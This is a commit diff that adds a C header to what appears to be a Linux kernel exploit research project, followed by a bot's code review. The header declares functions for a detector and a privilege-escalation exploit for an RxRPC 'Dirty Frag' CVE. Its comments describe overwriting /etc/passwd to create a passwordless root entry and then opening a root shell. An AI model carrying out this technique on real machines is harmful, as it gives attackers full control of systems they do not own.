Initial skeleton: README, CVE inventory, roadmap, ARCH, ethics + copy_fail_family module absorbed from DIRTYFAIL
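--- /dev/null
+++ b/dirtyfrag_rxrpc.h
@@ -0,0 +1,34 @@
+/*
+* DIRTYFAIL — dirtyfrag_rxrpc.h
+*
+* RxRPC variant of Dirty Frag (CVE-2026-43500).
+*/
+
+#ifndef DIRTYFAIL_DIRTYFRAG_RXRPC_H
+#define DIRTYFAIL_DIRTYFRAG_RXRPC_H
+
+#include "common.h"
+
+/* Precondition probe: kernel + rxrpc.ko + AF_RXRPC openable. */
+df_result_t dirtyfrag_rxrpc_detect(void);
+
+/* Real PoC: brute-force three rxkad session keys K_A, K_B, K_C such
+* that pcbc(fcrypt)-decrypting /etc/passwd line 1 at offsets 4/6/8
+* with last-write-wins produces "root::0:0:GGGGGG:/root:/bin/bash".
+* Then enter a fresh user/net namespace, run the three forged-handshake
+* splice triggers, and (if do_shell) execve `su -` to drop a root shell
+* via PAM `pam_unix nullok`. */
+df_result_t dirtyfrag_rxrpc_exploit(bool do_shell);
+df_result_t dirtyfrag_rxrpc_exploit_inner(void);
+
+/* Active probe: fires ONE rxkad handshake-forgery trigger against a
+* /tmp sentinel (never /etc/passwd). The trigger writes ~8 bytes of
+* pcbc(fcrypt)-decrypted ciphertext into the sentinel page; we don't
+* need to predict what landed — any byte change confirms the kernel
+* STORE happened. Skips fcrypt brute force entirely (a random 8-byte
+* key is fine for a structural probe). Returns DF_VULNERABLE if the
+* sentinel changed, DF_OK if intact, DF_PRECOND_FAIL on AA-block. */
+df_result_t dirtyfrag_rxrpc_active_probe(void);
+df_result_t dirtyfrag_rxrpc_active_probe_inner(void);
+
+#endif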
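Review bot: `dirtyfrag_rxrpc_exploit_inner` and `dirtyfrag_rxrpc_active_probe_inner` are exported from the header with no comment at all, so a caller cannot tell how they differ from their wrappers or what setup they assume — presumably the wrapper does the namespace entry and sentinel handling and the `_inner` variant is the bare body, but that is only inferred from the names. If they are called only from their own translation unit, making them `static` in the .c and dropping them from the header is the cleaner fix; otherwise each needs a one-line contract, e.g. `/* Bare body of dirtyfrag_rxrpc_exploit(); assumes the caller already performed the setup the wrapper does. */`. The active-probe comment should also state how the `/tmp` sentinel is created (a fresh `mkstemp`/`O_EXCL` file rather than a fixed name) so the promise "never /etc/passwd" is enforced by construction and the probe cannot be redirected onto another file, and `AA-block` deserves to be spelled out since `DF_PRECOND_FAIL` is the only signal the caller gets. `df_result_t` and `bool` are taken on faith from `common.h`, which is outside this hunk.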